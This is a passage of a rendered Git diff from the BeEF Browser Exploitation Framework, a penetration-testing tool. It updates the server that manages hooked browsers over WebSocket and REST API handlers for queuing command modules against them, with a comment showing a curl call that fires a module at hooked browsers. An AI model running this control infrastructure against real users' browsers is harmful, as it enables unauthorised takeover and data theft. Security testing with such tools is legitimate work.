:private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
:cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
}
}
# @note Start a WSS server socket
start_websocket_server(ws_secure_options, true)
end
# @note Start a WS server socket
ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
start_websocket_server(ws_options,false)
# #Thread for websocket-secure
# Thread.new {
# port = @@config.get("beef.http.websocket.secure_port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
# :tls_options => {
# :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
# :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
# }
# }
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket-secured channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket-secured error: #{e}"
# end
# end
# }
#
# }
#
##Thread for websocket
#Thread.new {
# port = @@config.get("beef.http.websocket.port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port}
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket error: #{e}"
# end
# end
# }
#}
end
def start_websocket_server(ws_options, secure)
Thread.new {
sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
EventMachine.run {
EventMachine::WebSocket.start(ws_options) do |ws|
begin
print_debug "New WebSocket channel open."
secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
ws.onmessage { |msg|
msg_hash = JSON.parse("#{msg}")
#@note messageHash[result] is Base64 encoded
@@ -80,7 +209,6 @@ module BeEF
end
}
}
end
#@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +243,7 @@ module BeEF
handler = data["handler"]
if handler.match(/command/)
BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
else #processing results from extensions, call the right handler
data["beefhook"] = hooked_browser
data["results"] = JSON.parse(Base64.decode64(data["result"]))

24
core/main/rest/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -29,6 +19,12 @@ module BeEF
end
end
module RegisterCategoriesHandler
def self.mount_handler(server)
server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
end
end
module RegisterLogsHandler
def self.mount_handler(server)
server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
@@ -43,6 +39,8 @@ module BeEF
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')

16
core/main/rest/handlers/admin.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

39
core/main/rest/handlers/categories.rb Normal file
View File

@@ -0,0 +1,39 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Categories < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
get '/' do
categories = BeEF::Modules::get_categories
cats = Array.new
i = 0
# todo add sub-categories support!
categories.each do |category|
cat = {"id" => i, "name" => category}
cats << cat
i += 1
end
cats.to_json
end
end
end
end
end

22
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -30,12 +20,16 @@ module BeEF
'Expires' => '0'
end
#
# @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
#
#get "/to/a/pub"
# "BeER please"
#end
#
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
#
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
@@ -49,7 +43,9 @@ module BeEF
output.to_json
end
#
# @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
#
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil

20
core/main/rest/handlers/logs.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -30,13 +20,17 @@ module BeEF
'Expires' => '0'
end
#
# @note Get all global logs
#
get '/' do
logs = BeEF::Core::Models::Log.all()
logs_to_json(logs)
end
#
# @note Get hooked browser logs
#
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil

53
core/main/rest/handlers/modules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -30,7 +20,9 @@ module BeEF
'Expires' => '0'
end
#
# @note Get all available and enabled modules (id, name, category)
#
get '/' do
mods = BeEF::Core::Models::CommandModule.all
@@ -50,7 +42,18 @@ module BeEF
mods_hash.to_json
end
get '/search/:mod_name' do
mod = BeEF::Core::Models::CommandModule.first(:name => params[:mod_name])
result = {}
if mod != nil
result = {'id' => mod.id}
end
result.to_json
end
#
# @note Get the module definition (info, options)
#
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
error 404 unless cmd != nil
@@ -76,20 +79,29 @@ module BeEF
#Content-Type: application/json; charset=UTF-8
#
#{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
#
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
:command_module_id => params[:mod_id], :id => params[:cmd_id])
error 404 unless cmd != nil
result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless result != nil
{
'date' => result.date,
'data' => result.data
}.to_json
results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless results != nil
results_hash = {}
i = 0
results.each do |result|
results_hash[i] = {
'date' => result.date,
'data' => result.data
}
i+=1
end
results_hash.to_json
end
#
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
@@ -123,6 +135,7 @@ module BeEF
#Content-Length: 35
#
#{"success":"true","command_id":"not_available"}
#
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
@@ -142,6 +155,7 @@ module BeEF
end
end
#
#@note Fire a new command module to multiple hooked browsers.
# Returns the command IDs of the launched modules, or 0 if firing got issues.
# POST request body example (for modules that don't need parameters, just remove "mod_params")
@@ -156,6 +170,7 @@ module BeEF
# curl example (alert module with custom text, 2 hooked browsers)):
#curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
#-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
#
post '/multi' do
request.body.rewind
begin

16
core/main/router/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/router/router.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

20
core/main/server.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -62,9 +52,9 @@ module BeEF
raise Exception::TypeError, '"url" needs to be a string' if not url.string?
if args == nil
mounts[url] = http_handler_class
@mounts[url] = http_handler_class
else
mounts[url] = http_handler_class, *args
@mounts[url] = http_handler_class, *args
end
print_debug("Server: mounted handler '#{url}'")
end

16
core/module.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Module

16
core/modules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Modules

16
core/ruby.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# @note Patching Ruby Security

16
core/ruby/hash.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Hash

16
core/ruby/module.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Module

16
core/ruby/object.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Object

16
core/ruby/patches/dm-do-adapter/adapter.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

Some files were not shown because too many files have changed in this diff Show More